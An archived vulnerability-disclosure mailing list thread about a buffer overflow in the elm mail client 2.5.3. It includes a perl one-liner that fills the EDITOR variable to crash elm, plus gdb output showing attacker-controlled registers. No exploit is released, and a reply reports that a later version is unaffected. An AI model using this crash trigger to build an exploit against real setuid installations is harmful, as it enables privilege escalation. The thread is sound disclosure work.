Vulnerability Development mailing list archives
Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)
From: "SecurITeam BugTraq Monitoring" <bugtraq () securiteam com>
Date: Mon, 25 Feb 2002 12:13:18 +0200
Hi, Elm 2.5 PL6, of August 7, 2001 isn't affected as you can see: # export EDITOR=`perl -e 'print "A" x 2000;'` # elm Notice: ELM requires an ".elm" subdirectory off your home directory to hold information such as your configuration preferences (the "elmrc" file) and aliases. May I create this directory for you (yes/no/quit) ? [y] : n Very well, but you may run into difficulties later. Nothing happens I don't think my version is old enough to manifest this vulnerability. Thanks Noam Rathaus http://www.SecurITeam.com http://www.BeyondSecurity.com ----- Original Message ----- From: "Ehud Tenenbaum" <analyzer () 2xss com> To: <vuln-dev () securityfocus com> Sent: Sunday, February 24, 2002 08:45 Subject: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)
Hey,
2xs Security team found new bug in elm, although its not suid
on linux systems(redhat 6.2, mandrak 8.0, slackware 7.1) we
believe its suid on other kind of *nix OS such as HP-UX
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ id
uid=100(w00p) gid=100(users) groups=100(users)
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ export EDITOR=`perl -e 'print "A"
x 2000;'`
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ elm
Notice: ELM requires an ".elm" subdirectory off your home directory
to hold information such as your configuration preferences (the
"elmrc" file) and aliases.
May I create this directory for you (yes/no/quit) ? [y] : n
Segmentation fault
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$
w00p@Analyzer:/tmp/w00p/elm2.5.3/bin$ gdb ./elm
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r
Starting program: /tmp/w00p/elm2.5.3/bin/./elm
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
Notice: ELM requires an ".elm" subdirectory off your home directory
to hold information such as your configuration preferences (the
"elmrc" file) and aliases.
May I create this directory for you (yes/no/quit) ? [y] : n
Program received signal SIGSEGV, Segmentation fault.
0x40074486 in catgets () from /lib/libc.so.6
(gdb) where
#0 0x40074486 in catgets () from /lib/libc.so.6
#1 0x805b6a6 in create_private_dir ()
#2 0x805b3fc in initialize ()
#3 0x80520bd in main ()
#4 0x4006faa7 in __libc_start_main () from /lib/libc.so.6
(gdb) info registers
eax 0x41414141 1094795585
ecx 0x40014000 1073823744
edx 0x0 0
ebx 0x4013bed4 1075035860
esp 0xbfffeca0 0xbfffeca0
ebp 0xbfffecb4 0xbfffecb4
esi 0x41414141 1094795585
edi 0xbffff264 -1073745308
eip 0x40074486 0x40074486
eflags 0x10202 66050
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0xbffff8a4 -1073743708
fop 0x0 0
(gdb)
Bug was found with BOS, Binary Overflow Scanner tool made
by 2xs Security team.
At this point we shall not release an exploit.
For Questions or Comments:
Ehud Tenenbaum <analyzer () 2xss com> CTO & Project manager.
Izik Kotler <izik () 2xss com> Senior programmer.
Mixter <mixter () 2xss com> Senior programmer.
acz <acz () 2xss com> QA/Programmer.
--
------------
Ehud Tenenbaum
C.T.O & Project Manager
2xs LTD.
Tel: 972-9-9519980
Fax: 972-9-9519982
E-Mail: ehud () 2xss com
------------
Have A Safe Day
Current thread:
- elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.) Ehud Tenenbaum (Feb 24)
- Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.) SecurITeam BugTraq Monitoring (Feb 25)
- Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.) Ehud Tenenbaum (Feb 26)
- Re: elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.) SecurITeam BugTraq Monitoring (Feb 25)